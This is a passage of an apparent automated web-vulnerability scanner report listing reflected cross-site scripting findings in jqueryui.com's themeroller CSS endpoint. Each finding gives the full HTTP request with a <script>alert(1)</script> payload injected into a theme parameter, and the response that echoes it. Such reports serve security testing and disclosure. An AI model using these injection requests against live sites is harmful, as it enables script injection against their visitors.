fDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15c2cf2<script>alert(1)</script>6fc6ab53cc7&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorCont
...[SNIP]...

1.192. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the HTML document as plain text between tags. The payload 20da6<script>alert(1)</script>148b59b0503 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=5520da6<script>alert(1)</script>148b59b0503&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:00 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=5520da6<script>alert(1)</script>148b59b0503&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.193. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the HTML document as plain text between tags. The payload adddf<script>alert(1)</script>efcd2d69d27 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60adddf<script>alert(1)</script>efcd2d69d27&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60adddf<script>alert(1)</script>efcd2d69d27&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a0
...[SNIP]...

1.194. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the HTML document as plain text between tags. The payload c8796<script>alert(1)</script>e82c1fa3989 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20c8796<script>alert(1)</script>e82c1fa3989&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
extureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20c8796<script>alert(1)</script>e82c1fa3989&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/*
...[SNIP]...

1.195. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the HTML document as plain text between tags. The payload 3bbcf<script>alert(1)</script>5c2068cb67e was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=103bbcf<script>alert(1)</script>5c2068cb67e&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=103bbcf<script>alert(1)</script>5c2068cb67e&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebu
...[SNIP]...

1.196. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureActive request parameter is copied into the HTML document as plain text between tags. The payload 7943c<script>alert(1)</script>5b85df05f4e was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png7943c<script>alert(1)</script>5b85df05f4e&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png7943c<script>alert(1)</script>5b85df05f4e&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404
...[SNIP]...

1.197. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureContent request parameter is copied into the HTML document as plain text between tags. The payload 23ac2<script>alert(1)</script>7ab3aebd3a was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png23ac2<script>alert(1)</script>7ab3aebd3a&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17796

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png23ac2<script>alert(1)</script>7ab3aebd3a&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&
...[SNIP]...

1.198. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureDefault request parameter is copied into the HTML document as plain text between tags. The payload ef26d<script>alert(1)</script>aed52ae9598 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.pngef26d<script>alert(1)</script>aed52ae9598&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
rContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.pngef26d<script>alert(1)</script>aed52ae9598&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=
...[SNIP]...

1.199. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureError request parameter is copied into the HTML document as plain text between tags. The payload 8246e<script>alert(1)</script>e193d9c2737 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png8246e<script>alert(1)</script>e193d9c2737&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ghlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png8246e<script>alert(1)</script>e193d9c2737&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-ser
...[SNIP]...

1.200. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureHeader request parameter is copied into the HTML document as plain text between tags. The payload a201a<script>alert(1)</script>bb7d36adf3b was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.pnga201a<script>alert(1)</script>bb7d36adf3b&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:16 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
.com/themeroller/?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.pnga201a<script>alert(1)</script>bb7d36adf3b&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcConten
...[SNIP]...

